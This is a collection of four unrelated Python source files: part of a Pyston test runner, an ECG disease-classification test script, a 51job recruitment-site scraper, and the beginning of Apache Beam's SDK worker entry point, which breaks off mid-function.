if l.startswith("# statcheck:"):
l = l[len("# statcheck:"):].strip()
opts.statchecks.append(l)
elif l.startswith("# run_args:"):
l = l[len("# run_args:"):].split()
opts.jit_args += l
elif l.startswith("# expected:"):
assert opts.expected == "success", "Multiple 'expected:' lines found!"
opts.expected = l[len("# expected:"):].strip()
assert opts.expected != "success", "'expected: success' is the default and is ignored"
elif l.startswith("# should_error"):
opts.should_error = True
elif l.startswith("# fail-if:"):
condition = l.split(':', 1)[1].strip()
if eval(condition):
opts.expected = "fail"
elif l.startswith("# skip-if:"):
skip_if = l[len("# skip-if:"):].strip()
if eval(skip_if):
opts.skip = "skip-if: %s" % skip_if[:30]
elif l.startswith("# allow-warning:"):
opts.allow_warnings.append("Warning: " + l.split(':', 1)[1].strip())
elif l.startswith("# no-collect-stats"):
opts.collect_stats = False
if not opts.skip:
# consider other reasons for skipping file
if SKIP_FAILING_TESTS and opts.expected == 'fail':
opts.skip = 'expected to fail'
elif os.path.basename(fn).split('.')[0] in TESTS_TO_SKIP:
opts.skip = 'command line option'
assert opts.expected in ("success", "fail", "statfail"), opts.expected
if TEST_PYPY:
opts.jit_args = []
opts.collect_stats = False
opts.check_stats = False
opts.expected = "success"
if opts.collect_stats:
opts.jit_args = ['-T'] + opts.jit_args
return opts
def diff_output(expected, received, expected_file_prefix, received_file_prefix):
exp_fd, exp_fn = tempfile.mkstemp(prefix=expected_file_prefix)
rec_fd, rec_fn = tempfile.mkstemp(prefix=received_file_prefix)
os.fdopen(exp_fd, 'w').write(expected)
os.fdopen(rec_fd, 'w').write(received)
p = subprocess.Popen(["diff", "--unified=5", "-a", exp_fn, rec_fn], stdout=subprocess.PIPE, preexec_fn=set_ulimits)
diff = p.stdout.read()
assert p.wait() in (0, 1)
os.unlink(exp_fn)
os.unlink(rec_fn)
return diff
def determine_test_result(fn, opts, code, out, stderr, elapsed):
if opts.allow_warnings:
out_lines = []
for l in out.split('\n'):
for regex in opts.allow_warnings:
if re.match(regex, l):
break
else:
out_lines.append(l)
out = "\n".join(out_lines)
stats = None
if opts.collect_stats:
stats = {}
have_stats = (stderr.count("Stats:") == 1 and stderr.count("(End of stats)") == 1)
if code >= 0:
if not have_stats:
color = 31
msg = "no stats available"
if opts.expected == "fail":
return success_message("Expected failure (no stats found)")
elif KEEP_GOING:
failed.append(fn)
if VERBOSE >= 1:
return "\033[%dmFAILED\033[0m (%s)\n%s" % (color, msg, stderr)
else:
return "\033[%dmFAILED\033[0m (%s)" % (color, msg)
else:
raise Exception("%s\n%s" % (msg, stderr))
assert have_stats
if have_stats:
assert stderr.count("Stats:") == 1
stderr, stats_str = stderr.split("Stats:")
stats_str, stderr_tail = stats_str.split("(End of stats)\n")
stderr += stderr_tail
other_stats_str, counter_str = stats_str.split("Counters:")
for l in counter_str.strip().split('\n'):
assert l.count(':') == 1, l
k, v = l.split(':')
stats[k.strip()] = int(v)
last_stderr_line = stderr.strip().split('\n')[-1]
if EXIT_CODE_ONLY:
# fools the rest of this function into thinking the output is OK & just checking the exit code.
# there oughtta be a cleaner way to do this.
expected_code, expected_out, expected_err = 0, out, stderr
else:
# run CPython to get the expected output
expected_code, expected_out, expected_err = get_expected_output(fn)
color = 31 # red
if code != expected_code:
if code == 0:
err = "(Unexpected success)"
else:
err = last_stderr_line
if code == -signal.SIGALRM:
msg = "Timed out"
color = 33 # yellow
elif code == -signal.SIGKILL:
msg = "Killed!"
else:
msg = "Exited with code %d (expected code %d)" % (code, expected_code)
if opts.expected == "fail":
return success_message("Expected failure (got code %d, should be %d)" % (code, expected_code))
elif KEEP_GOING:
failed.append(fn)
if VERBOSE >= 1:
return "\033[%dmFAILED\033[0m (%s)\n%s" % (color, msg, stderr)
else:
return "\033[%dmFAILED\033[0m (%s)" % (color, msg)
else:
raise Exception("%s\n%s\n%s" % (msg, err, stderr))
elif opts.should_error == (code == 0):
if code == 0:
msg = "Exited successfully; remove '# should_error' if this is expected"
else:
msg = "Exited with code %d; add '# should_error' if this is expected" % code
if KEEP_GOING:
failed.append(fn)
return "\033[%dmFAILED\033[0m (%s)" % (color, msg)
else:
# show last line of stderr so we have some idea went wrong
print "Last line of stderr: " + last_stderr_line
raise Exception(msg)
elif out != expected_out:
if opts.expected == "fail":
return success_message("Expected failure (bad output)")
else:
diff = diff_output(expected_out, out, "expected_", "received_")
if KEEP_GOING:
failed.append(fn)
if VERBOSE >= 1:
return "\033[%dmFAILED\033[0m (bad output)\n%s" % (color, diff)
else:
return "\033[%dmFAILED\033[0m (bad output)" % (color,)
else:
raise Exception("Failed on %s:\n%s" % (fn, diff))
elif not TEST_PYPY and canonicalize_stderr(stderr) != canonicalize_stderr(expected_err):
if opts.expected == "fail":
return success_message("Expected failure (bad stderr)")
else:
diff = diff_output(expected_err, stderr, "expectederr_", "receivederr_")
if KEEP_GOING:
failed.append(fn)
if VERBOSE >= 1:
return "\033[%dmFAILED\033[0m (bad stderr)\n%s" % (color, diff)
else:
return "\033[%dmFAILED\033[0m (bad stderr)" % (color,)
else:
raise Exception((canonicalize_stderr(stderr), canonicalize_stderr(expected_err)))
elif opts.expected == "fail":
if KEEP_GOING:
failed.append(fn)
return "\033[31mFAILED\033[0m (unexpected success)"
raise Exception("Unexpected success on %s" % fn)
r = ("Correct output (%5.1fms)" % (elapsed * 1000,),)
if opts.check_stats:
def noninit_count(s):
return stats.get(s, 0) - stats.get("_init_" + s, 0)
for l in opts.statchecks:
test = eval(l)
if not test:
if opts.expected == "statfail":
r += ("(expected statfailure)",)
break
else:
msg = ()
m = re.match("""stats\[['"]([\w_]+)['"]]""", l)
if m:
statname = m.group(1)
msg = (l, statname, stats[statname])
m = re.search("""noninit_count\(['"]([\w_]+)['"]\)""", l)
if m and not msg:
statname = m.group(1)
msg = (l, statname, noninit_count(statname))
if not msg:
msg = (l, stats)
elif KEEP_GOING:
failed.append(fn)
if VERBOSE:
return r + ("\033[31mFailed statcheck\033[0m\n%s" % (msg,),)
else:
return r + ("\033[31mFailed statcheck\033[0m",)
else:
raise Exception(msg)
else:
# only can get here if all statchecks passed
if opts.expected == "statfail":
if KEEP_GOING:
failed.append(fn)
return r + ("\033[31mUnexpected statcheck success\033[0m",)
else:
raise Exception(("Unexpected statcheck success!", opts.statchecks, stats))
else:
r += ("(ignoring stats)",)
if opts.run_memcheck:
if code == 0:
start = time.time()
p = subprocess.Popen(["valgrind", "--tool=memcheck", "--leak-check=no"] + run_args, stdout=open("/dev/null", 'w'), stderr=subprocess.PIPE, stdin=open("/dev/null"))
out, err = p.communicate()
assert p.wait() == 0
if "Invalid read" not in err:
elapsed = (time.time() - start)
r += ("Memcheck passed (%4.1fs)" % (elapsed,),)
else:
if KEEP_GOING:
failed.append(fn)
return r + ("\033[31mMEMCHECKS FAILED\033[0m",)
else:
raise Exception(err)
else:
r += ("(Skipping memchecks)",)
return success_message(r)
q = Queue.Queue()
cv = threading.Condition()
results = {}
quit = {}
def worker_thread():
while not quit:
try:
job = q.get()
if job is None:
break
results[job[0]] = run_test(*job)
with cv:
cv.notifyAll()
except:
import traceback
# traceback.print_exc()
quit[job[0]] = job[0] + ':\n' + traceback.format_exc()
results[job[0]] = None
with cv:
cv.notifyAll()
# os._exit(-1)
def fileSize(fn):
return os.stat(fn).st_size
# return len(list(open(fn)))
# our arguments
parser = argparse.ArgumentParser(description='Runs Pyston tests.')
parser.add_argument('-m', '--run-memcheck', action='store_true', help='run memcheck')
parser.add_argument('-j', '--num-threads', metavar='N', type=int, default=NUM_THREADS,
help='number of threads')
parser.add_argument('-k', '--keep-going', default=KEEP_GOING, action='store_true',
help='keep going after test failure')
parser.add_argument('-R', '--image', default=IMAGE,
help='the executable to test (default: %s)' % IMAGE)
parser.add_argument('-K', '--no-keep-going', dest='keep_going', action='store_false',
help='quit after test failure')
parser.add_argument('-a', '--extra-args', default=[], action='append',
help="additional arguments to pyston (must be invoked with equal sign: -a=-ARG)")
parser.add_argument('-t', '--time-limit', type=int, default=TIME_LIMIT,
help='set time limit in seconds for each test')
parser.add_argument('-s', '--skip-tests', type=str, default='',
help='tests to skip (comma-separated)')
parser.add_argument('-e', '--exit-code-only', action='store_true',
help="only check exit code; don't run CPython to get expected output to compare against")
parser.add_argument('-q', '--quiet', action='store_true',
help="Only display failing tests")
parser.add_argument('--skip-failing', action='store_true',
help="skip tests expected to fail")
parser.add_argument('--order-by-mtime', action='store_true',
help="order test execution by modification time, instead of file size")
parser.add_argument('test_dir')
parser.add_argument('pattern', nargs='*')
def main(orig_dir):
global KEEP_GOING
global IMAGE
global EXTRA_JIT_ARGS
global TIME_LIMIT
global TEST_DIR
global FN_JUST_SIZE
global TESTS_TO_SKIP
global EXIT_CODE_ONLY
global SKIP_FAILING_TESTS
global VERBOSE
global EXTMODULE_DIR_PYSTON
global EXTMODULE_DIR
global DISPLAY_SUCCESSES
global IS_OPTIMIZED
run_memcheck = False
opts = parser.parse_args()
run_memcheck = opts.run_memcheck
NUM_THREADS = opts.num_threads
IMAGE = os.path.join(orig_dir, opts.image)
KEEP_GOING = opts.keep_going
EXTRA_JIT_ARGS += opts.extra_args
TIME_LIMIT = opts.time_limit
TESTS_TO_SKIP = opts.skip_tests.split(',')
TESTS_TO_SKIP = filter(bool, TESTS_TO_SKIP) # "".split(',') == ['']
EXIT_CODE_ONLY = opts.exit_code_only
SKIP_FAILING_TESTS = opts.skip_failing
if opts.quiet:
DISPLAY_SUCCESSES = False
TEST_DIR = os.path.join(orig_dir, opts.test_dir)
EXTMODULE_DIR_PYSTON = os.path.abspath(os.path.dirname(os.path.realpath(IMAGE)) + "/test/test_extension/")
# EXTMODULE_DIR = os.path.abspath(os.path.dirname(os.path.realpath(IMAGE)) + "/test/test_extension/build/lib.linux-x86_64-2.7/")
EXTMODULE_DIR = os.path.abspath(orig_dir) + "/test/test_extension/build/lib.linux-x86_64-2.7/"
patterns = opts.pattern
IS_OPTIMIZED = int(subprocess.check_output([IMAGE, "-c", 'import sysconfig; print int("-O0" not in sysconfig.get_config_var(\"CFLAGS\"))']))
if not patterns and not TESTS_TO_SKIP:
TESTS_TO_SKIP = ["t", "t2", "t3"]
assert os.path.isdir(TEST_DIR), "%s doesn't look like a directory with tests in it" % TEST_DIR
if TEST_DIR.rstrip('/').endswith("cpython") and not EXIT_CODE_ONLY:
print >>sys.stderr, "Test directory name ends in cpython; are you sure you don't want --exit-code-only?"
if TEST_DIR.rstrip('/').endswith("extra") or TEST_DIR.rstrip('/').endswith("integration"):
if not os.path.exists(os.path.join(TEST_DIR, '../lib/virtualenv/virtualenv.py')):
print "Looks like you don't have the integration-test repositories checked out; skipping them."
print "If you would like to run them, please run:"
print "git submodule update --init --recursive", os.path.join(TEST_DIR, "../lib")
sys.exit(0)
# do we need this any more?
IGNORE_STATS = ["%s/%d.py" % (TEST_DIR, i) for i in ()] + []
tests = [t for t in glob.glob("%s/*.py" % TEST_DIR)]
LIB_DIR = os.path.join(sys.prefix, "lib/python2.7")
for t in tests:
bn = os.path.basename(t)
assert bn.endswith(".py")
module_name = bn[:-3]
if os.path.exists(os.path.join(LIB_DIR, module_name)) or \
os.path.exists(os.path.join(LIB_DIR, module_name + ".py")) or \
module_name in sys.builtin_module_names:
raise Exception("Error: %s hides builtin module '%s'" % (t, module_name))
if patterns:
filtered_tests = []
for t in tests:
if any(re.match(os.path.join(TEST_DIR, p) + ".*\.py", t) for p in patterns):
filtered_tests.append(t)
tests = filtered_tests
if not tests:
# print >>sys.stderr, "No tests matched the given patterns. OK by me!"
# this can happen legitimately in e.g. `make check_test_foo` if test_foo.py is a CPython regression test.
sys.exit(0)
FN_JUST_SIZE = max(20, 2 + max(len(os.path.basename(fn)) for fn in tests))
if TEST_PYPY:
IMAGE = '/usr/local/bin/pypy'
if not patterns:
if opts.order_by_mtime:
tests.sort(key=lambda fn:os.stat(fn).st_mtime, reverse=True)
else:
tests.sort(key=fileSize)
for fn in tests:
check_stats = fn not in IGNORE_STATS
q.put((fn, check_stats, run_memcheck))
threads = []
for i in xrange(NUM_THREADS):
t = threading.Thread(target=worker_thread)
t.setDaemon(True)
t.start()
threads.append(t)
q.put(None)
for fn in tests:
with cv:
while fn not in results:
try:
cv.wait(1)
except KeyboardInterrupt:
print >>sys.stderr, "Interrupted"
sys.exit(1)
if results[fn] is None:
assert quit
print quit.pop(fn).strip()
for fn, s in quit.items():
print "(%s also failed)" % fn
sys.exit(1)
break
if results[fn]:
name = os.path.basename(fn).rjust(FN_JUST_SIZE)
msgs = results[fn]
if isinstance(msgs,str):
msgs = [msgs]
print ' '.join([name] + list(msgs))
for t in threads:
t.join()
if failed:
sys.exit(1)
if __name__ == "__main__":
origdir = os.getcwd()
tmpdir = tempfile.mkdtemp()
os.chdir(tmpdir)
try:
main(origdir)
finally:
shutil.rmtree(tmpdir)
# adding a comment here to invalidate cached expected results
|
EMD_Parallel_Test.py
|
import pyhht
from pyhht.emd import EMD
from pyhht.visualization import plot_imfs
import numpy as np
import math
from pyhht.utils import extr
from pyhht.utils import get_envelops
import matplotlib.pyplot as plt
from pyhht.utils import inst_freq
import wfdb
import os
import sys
import glob
import GPUtil
import config
import EMD_Models as M
from Queue import Queue
import threading
import tensorflow as tf
import time
from keras.models import model_from_json
import pickle
import Confusion_Matrix_Parallel as CM
global C,diseases,IMF_1Q,IMF_2Q,IMF_3Q,IMF_4Q,IMF_5Q,IMF_6Q,number_test_image,finished,q,true_classes
global fo
fo = "./Outputs-Parallel-PTB-8-class-Alexnet-6IMF/"
C = config.Config()
'''
#For MIT-BIH
diseases={'SBR':3,
'N':1,
'P':2,
'AFIB':0}
'''
#Saint Petesberg
#diseases = {'AV Nodal Block':0,'Acute MI':1, 'Atrial Fibrilation':2,'Coronary artery disease':3,'Earlier MI':4, 'Healthy':5,'Sinus node dysfunction':6,'Transient ischemic attack':7,'WPW':8}
IMF_1Q = Queue(maxsize = 500)
IMF_2Q = Queue(maxsize = 500)
IMF_3Q = Queue(maxsize = 500)
IMF_4Q = Queue(maxsize = 500)
IMF_5Q = Queue(maxsize = 500)
IMF_6Q = Queue(maxsize = 500)
q=[]
diseases={'Myocardial infarction':5,
'Healthy control':3,
'Cardiomyopathy':1,
'Bundle branch block':0,
'Dysrhythmia':2,
'Hypertrophy':4,
'Valvular heart disease':7,
'Myocarditis':6}
def result_analysis(number_test_image):
result=[]
detailed_output = open(fo+'Test_Result/detailed_prob/detailed_parallel_probability_test.txt','w')
max_output = open(fo+'Test_Result/Maximum_Prob/maximum_parallel_probability_test.txt','w')
max_output.write('#IMFnumber, max_probability, predicted class, original class\n')
for i in range(0,number_test_image):
v=q[i][0].index(max(q[i][0]))
tr=diseases[str(true_classes[i])]
string = 'IMF_'
for z in range(0,C.classes):
string = string + ','+str(q[i][0][z])
string = string +','+str(round(max(q[i][0]),5))+','+str(tr)+'\n'
detailed_output.write(string)
string = 'IMF_,'+str(round(max(q[i][0]),5))+','+str(v)+','+str(tr)+'\n'
max_output.write(string)
if(v == tr):
result.append(1)
else:
result.append(0)
#save it
with open(fo+"Test_Result/result_parallel__test.pickle","wb") as f:
pickle.dump(result,f)
#result list has the number 1 indices for which match occur and 0 indices for which match do not occur
#Calculate the mean, accuracy, std etc
result_1 = result.count(1)
result_length = len(result)
accuracy = (result_1/float(result_length))*100
with open(fo+"Test_Result/result_parallel_test.txt",'w') as f:
string = 'Accuracy = '+str(accuracy)
f.write(string)
print('\nTotal Percentage of match = {}'.format(accuracy))
print('\n\n\nFinished Testing--------Thank You for Using My Code\nNAHIAN IBN HASAN\nDepartment of EEE')
print('Bangladesh University of Engineering and Technology\nBangladesh\ngmail: nahianhasan1994@gmail.com')
print('LinkedIn Profile: ')
detailed_output.close()
max_output.close()
#CM.Confusion_Matrix_Plot()
def Evaluate_Test_IMFs():
global q,IMF_1Q,IMF_2Q,IMF_3Q,IMF_4Q,IMF_5Q,IMF_6Q
'''
deviceIDs=[]
while not deviceIDs:
deviceIDs = GPUtil.getAvailable(order='first',limit=1,maxMemory=0.85,maxLoad=0.99)
print 'searching for GPU to be available. Please wait.....'
print 'GPU Found...Starting Training\n'
# Assume that you have 12GB of GPU memory and want to allocate ~4GB:
gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=0.15)
sess = tf.Session(config=tf.ConfigProto(gpu_options=gpu_options))
'''
json_file = open(fo+'Final_Weights/model_parallel.json' ,'r')
loaded_model_json = json_file.read()
json_file.close()
model = model_from_json(loaded_model_json)
# load weights into new model
weight_file = fo+"Training_Records/weights_parallel_best_of_IMF.hdf5"
model.load_weights(weight_file)
print "\n\nLoaded ",weight_file," from disk\n\n"
model.compile(loss = 'categorical_crossentropy', optimizer = C.optimizer, metrics = ['accuracy'])
read_data=0
track = 0#a variable to indicte the end of test set
while(1):
if not IMF_1Q.empty():
read_data=read_data+1
print('Test data runnning = {}'.format(read_data))
arr_1 = np.expand_dims((np.array([IMF_1Q.get(),])),axis=2)
arr_2 = np.expand_dims((np.array([IMF_2Q.get(),])),axis=2)
arr_3 = np.expand_dims((np.array([IMF_3Q.get(),])),axis=2)
arr_4 = np.expand_dims((np.array([IMF_4Q.get(),])),axis=2)
arr_5 = np.expand_dims((np.array([IMF_5Q.get(),])),axis=2)
arr_6 = np.expand_dims((np.array([IMF_6Q.get(),])),axis=2)
q.append(model.predict([arr_1,arr_2,arr_3,arr_4,arr_5,arr_6]).tolist())
track=0
else:
track=track+1
if track==2000:
break
continue
print ('Finished Testing')
#Now q1,q2,q3...q6 have the predicted results containing the probabilities of each class for each IMF
#For example q1[0] has 9(number of classes) probabilities
#get the index of highest probability and match the index with that of disease indexes above after label encoder
result_analysis(number_test_image)
def Main():
global number_test_image,IMF_1Q,IMF_2Q,IMF_3Q,IMF_4Q,IMF_5Q,IMF_6Q,true_classes
print('Reading IMF csv data files for testing')
IMF1_test = open(C.IMF_csv_path+'IMF1_test.csv','r')
IMF2_test = open(C.IMF_csv_path+'IMF2_test.csv','r')
line1 = IMF1_test.readline()
line2 = IMF2_test.readline()
if C.number_of_IMFs >= 3:
IMF3_test = open(C.IMF_csv_path+'IMF3_test.csv','r')
line3 = IMF3_test.readline()
if C.number_of_IMFs >= 4:
IMF4_test = open(C.IMF_csv_path+'IMF4_test.csv','r')
line4 = IMF4_test.readline()
if C.number_of_IMFs >= 5:
IMF5_test = open(C.IMF_csv_path+'IMF5_test.csv','r')
line5 = IMF5_test.readline()
if C.number_of_IMFs >= 6:
IMF6_test = open(C.IMF_csv_path+'IMF6_test.csv','r')
line6 = IMF6_test.readline()
print("Finished Loading Testing Data")
print('Reading Models')
t = threading.Thread(target=Evaluate_Test_IMFs, name='thread1')
t.start()
true_classes = []
number_test_image = 0
while (line1 and line2 and line3 and line4 and line5 and line6):
splitted1 = line1.split(',')
splitted_1 = splitted1[0:C.samplenumber]
splitted2 = line2.split(',')
splitted_2 = splitted2[0:C.samplenumber]
if C.number_of_IMFs >= 3:
splitted3 = line3.split(',')
splitted_3 = splitted3[0:C.samplenumber]
if C.number_of_IMFs >= 4:
splitted4 = line4.split(',')
splitted_4 = splitted4[0:C.samplenumber]
if C.number_of_IMFs >= 5:
splitted5 = line5.split(',')
splitted_5 = splitted5[0:C.samplenumber]
if C.number_of_IMFs >= 6:
splitted6 = line6.split(',')
splitted_6 = splitted6[0:C.samplenumber]
class_name = str(splitted1[C.samplenumber][:-1])
'''
#for MIT-BIH
if class_name in ['AFL','B','T','VFL','NOD','VT','IVR']:
line1 = IMF1_test.readline()
line2 = IMF2_test.readline()
line3 = IMF3_test.readline()
line4 = IMF4_test.readline()
line5 = IMF5_test.readline()
line6 = IMF6_test.readline()
continue
'''
if class_name in ['Miscellaneous']:
line1 = IMF1_test.readline()
line2 = IMF2_test.readline()
line3 = IMF3_test.readline()
line4 = IMF4_test.readline()
line5 = IMF5_test.readline()
line6 = IMF6_test.readline()
continue
true_classes.append(class_name)
splitted1 = np.asarray(splitted_1)
splitted2 = np.asarray(splitted_2)
splitted3 = np.asarray(splitted_3)
splitted4 = np.asarray(splitted_4)
splitted5 = np.asarray(splitted_5)
splitted6 = np.asarray(splitted_6)
try:
IMF_1Q.put(splitted1)
IMF_2Q.put(splitted2)
if C.number_of_IMFs >= 3:
IMF_3Q.put(splitted3)
if C.number_of_IMFs >= 4:
IMF_4Q.put(splitted4)
if C.number_of_IMFs >= 5:
IMF_5Q.put(splitted5)
if C.number_of_IMFs >= 6:
IMF_6Q.put(splitted6)
number_test_image = number_test_image+1
print('Test data in the queue so far = {}'.format(number_test_image))
line1 = IMF1_test.readline()
line2 = IMF2_test.readline()
line3 = IMF3_test.readline()
line4 = IMF4_test.readline()
line5 = IMF5_test.readline()
line6 = IMF6_test.readline()
except:
print sys.exc_info(),'\n'
line1 = IMF1_test.readline()
line2 = IMF2_test.readline()
line3 = IMF3_test.readline()
line4 = IMF4_test.readline()
line5 = IMF5_test.readline()
line6 = IMF6_test.readline()
#Check whether the testing has been completed
#if __name__ == '__Main__':
Main()
|
QCWY.py
|
__author__ = 'Joynice'
from utils.utils import get_header, get_time
import requests
import queue
from lxml import etree
import threading
import os
import csv
class QCWY(object):
'''
前程无忧
:param
传入参数:关键字、城市、线程数
传出:csv文件
'''
def __init__(self, keyword, city='北京', thread=10, path=os.getcwd()):
self.keyword = keyword
self.city = city
self.thread = thread
self.csv_header = ['职位名称', '详细链接', '公司名称', '工作地点', '薪资', '发布时间', '职位信息', '公司信息']
self.baseurl = 'https://search.51job.com/list/'
self.header = get_header()
self.path = path
self.pagequeue = queue.Queue()
self.jobqueue = queue.Queue()
def _get_city_code(self):
url = 'https://js.51jobcdn.com/in/js/2016/layer/area_array_c.js'
req = requests.get(url, headers=self.header).text
a = req.find(self.city)
return req[a - 9:a - 3]
def _get_max_page(self):
city_code = self._get_city_code()
url = self.baseurl + '{},000000,0000,00,9,99,{},2,1.html'.format(city_code, self.keyword)
req = requests.get(url=url, headers=self.header)
req.encoding = 'gbk'
html = etree.HTML(req.text)
max_page = html.xpath('//*[@id="resultList"]/div[2]/div[5]/text()')[1][3:]
for page in range(1, int(max_page) + 1):
page_url = self.baseurl + '{},000000,0000,00,9,99,{},2,{}.html'.format(city_code, self.keyword, page)
self.pagequeue.put(page_url)
def Spider(self):
while not self.pagequeue.empty():
url = self.pagequeue.get()
print('正在爬取:{}'.format(url))
req = requests.get(url, headers=get_header())
req.encoding = 'gbk'
html = etree.HTML(req.text)
for i in range(4, 54):
try:
title = html.xpath('//*[@id="resultList"]/div[{}]/p/span/a/@title'.format(i))
if title[0] == None:
break
name = html.xpath('//*[@id="resultList"]/div[{}]/span[1]/a/text()'.format(i))
url = html.xpath('//*[@id="resultList"]/div[{}]/p/span/a/@href'.format(i))
print(url[0])
area = html.xpath('//*[@id="resultList"]/div[{}]/span[2]/text()'.format(i))
salery = html.xpath('//*[@id="resultList"]/div[{}]/span[3]/text()'.format(i))
time = html.xpath('//*[@id="resultList"]/div[{}]/span[4]/text()'.format(i))
req1 = requests.get(url[0], headers=get_header())
req1.encoding = 'gb2312'
html1 = etree.HTML(req1.text)
detail = ''.join(html1.xpath('//*[@class="bmsg job_msg inbox"]//*/text()'))
if detail.isspace():
detail = ''.join(html1.xpath('//*[@class="bmsg job_msg inbox"]/text()'))
print(detail)
gongsi = ''.join(html1.xpath('//*[@class="tmsg inbox"]/text()'))
if gongsi.isspace():
gongsi = ''.join(html1.xpath('//*[@class="tmsg inbox"]//*/text()'))
data = {
"职位名称": title[0],
"详细链接": url[0],
"公司名称": name[0],
"工作地点": area[0],
"薪资": salery[0] if len(salery)!=0 else None,
"发布时间": time[0],
"职位信息": detail,
"公司信息": gongsi
}
self.jobqueue.put(data)
except:
continue
def run(self):
self._get_max_page()
thread_list = []
for i in range(self.thread):
t = threading.Thread(target=self.Spider)
thread_list.append(t)
for t in thread_list:
t.setDaemon(True)
t.start()
for t in thread_list:
t.join()
if os.path.exists(self.path):
data_list = []
self.path = os.path.join(self.path,'save-data')
while not self.jobqueue.empty():
data_list.append(self.jobqueue.get())
with open(os.path.join(self.path, '前途无忧招聘_关键词_{}_城市_{}.csv'.format(self.keyword, self.city)), 'w',
newline='', encoding='utf-8-sig') as f:
f_csv = csv.DictWriter(f, self.csv_header)
f_csv.writeheader()
f_csv.writerows(data_list)
if __name__ == '__main__':
a = QCWY(keyword='java', city='北京').run()
|
sdk_worker_main.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""SDK Fn Harness entry point."""
from __future__ import absolute_import
import http.server
import json
import logging
import os
import re
import sys
import threading
import traceback
from builtins import object
from google.protobuf import text_format # type: ignore # not in typeshed
from apache_beam.internal import pickler
from apache_beam.options.pipeline_options import DebugOptions
from apache_beam.options.pipeline_options import PipelineOptions
from apache_beam.options.pipeline_options import ProfilingOptions
from apache_beam.portability.api import endpoints_pb2
from apache_beam.runners.internal import names
from apache_beam.runners.worker.log_handler import FnApiLogRecordHandler
from apache_beam.runners.worker.sdk_worker import SdkHarness
from apache_beam.utils import profiler
# This module is experimental. No backwards-compatibility guarantees.
_LOGGER = logging.getLogger(__name__)
class StatusServer(object):
@classmethod
def get_thread_dump(cls):
lines = []
frames = sys._current_frames() # pylint: disable=protected-access
for t in threading.enumerate():
lines.append('--- Thread #%s name: %s ---\n' % (t.ident, t.name))
lines.append(''.join(traceback.format_stack(frames[t.ident])))
return lines
def start(self, status_http_port=0):
"""Executes the serving loop for the status server.
Args:
status_http_port(int): Binding port for the debug server.
Default is 0 which means any free unsecured port
"""
class StatusHttpHandler(http.server.BaseHTTPRequestHandler):
"""HTTP handler for serving stacktraces of all threads."""
def do_GET(self): # pylint: disable=invalid-name
"""Return all thread stacktraces information for GET request."""
self.send_response(200)
self.send_header('Content-Type', 'text/plain')
self.end_headers()
for line in StatusServer.get_thread_dump():
self.wfile.write(line.encode('utf-8'))
def log_message(self, f, *args):
"""Do not log any messages."""
pass
self.httpd = httpd = http.server.HTTPServer(
('localhost', status_http_port), StatusHttpHandler)
_LOGGER.info('Status HTTP server running at %s:%s', httpd.server_name,
httpd.server_port)
httpd.serve_forever()
def main(unused_argv):
"""Main entry point for SDK Fn Harness."""
if 'LOGGING_API_SERVICE_DESCRIPTOR' in os.environ:
try:
logging_service_descriptor = endpoints_pb2.ApiServiceDescriptor()
text_format.Merge(os.environ['LOGGING_API_SERVICE_DESCRIPTOR'],
logging_service_descriptor)
# Send all logs to the runner.
fn_log_handler = FnApiLogRecordHandler(logging_service_descriptor)
# TODO(BEAM-5468): This should be picked up from pipeline options.
logging.getLogger().setLevel(logging.INFO)
logging.getLogger().addHandler(fn_log_handler)
_LOGGER.info('Logging handler created.')
except Exception:
_LOGGER.error("Failed to set up logging handler, continuing without.",
exc_info=True)
fn_log_handler = None
else:
fn_log_handler = None
# Start status HTTP server thread.
thread = threading.Thread(name='status_http_server',
target=StatusServer().start)
thread.daemon = True
thread.setName('status-server-demon')
thread.start()
if 'PIPELINE_OPTIONS' in os.environ:
sdk_pipeline_options = _parse_pipeline_options(
os.environ['PIPELINE_OPTIONS'])
else:
sdk_pipeline_options = PipelineOptions.from_dictionary({})
if 'SEMI_PERSISTENT_DIRECTORY' in os.environ:
semi_persistent_directory = os.environ['SEMI_PERSISTENT_DIRECTORY']
else:
semi_persistent_directory = None
_LOGGER.info('semi_persistent_directory: %s', semi_persistent_directory)
_worker_id = os.environ.get('WORKER_ID', None)
try:
_load_main_session(semi_persistent_directory)
except Exception: # pylint: disable=broad-except
exception_details = traceback.format_exc()
_LOGGER.error(
'Could not load main session: %s', exception_details, exc_info=True)
try:
_LOGGER.info('Python sdk harness started with pipeline_options: %s',
sdk_pipeline_options.get_all_options(drop_default=True))
service_descriptor = endpoints_pb2.ApiServiceDescriptor()
text_format.Merge(os.environ['CONTROL_API_SERVICE_DESCRIPTOR'],
service_descriptor)
# TODO(robertwb): Support credentials.
assert not service_descriptor.oauth2_client_credentials_grant.url
SdkHarness(
control_address=service_descriptor.url,
worker_id=_worker_id,
state_cache_size=_get_state_cache_size(sdk_pipeline_options),
profiler_factory=profiler.Profile.factory_from_options(
sdk_pipeline_options.view_as(ProfilingOptions))
).run()
_LOGGER.info('Python sdk harness exiting.')
except: # pylint: disable=broad-except
_LOGGER.exception('Python sdk harness failed: ')
raise
finally:
if fn_log_handler:
fn_log_handler.close()
def _parse_pipeline_options(options_json):
options = json.loads(options_json)
# Check the options field first for backward compatibility.
if 'options' in options:
return PipelineOptions.from_dictionary(options.get('options'))
else:
# Remove extra urn part from the key.
portable_option_regex = r'^beam:option:(?P<key>.*):v1$'
return PipelineOptions.from_dictionary({
re.match(portable_option_regex, k).group('key')
if re.match(portable_option_regex, k) else k: v
for k, v in options.items()
})
def _get_state_cache_size(pipeline_options):
"""Defines the upper number of state items to cache.
Note: state_cache_size is an experimental flag and might not be available in
future releases.
Returns:
an int indicating the maximum number of items to cache.
Default is 0 (disabled)
"""
experiments = pipeline_options.view_as(DebugOptions).experiments
experiments = experiments if experiments else []
for experiment in experiments:
# There should only be 1 match so returning from the loop
if re.match(r'state_cache_size=', experiment):
return int(
re.match(r'state_cache_size=(?P<state_cache_size>.*)',
experiment).group('state_cache_size'))
return 0
def _load_main_session(semi_persistent_directory):
"""Loads a pickled main session from the path specified."""
if semi_persistent_directory:
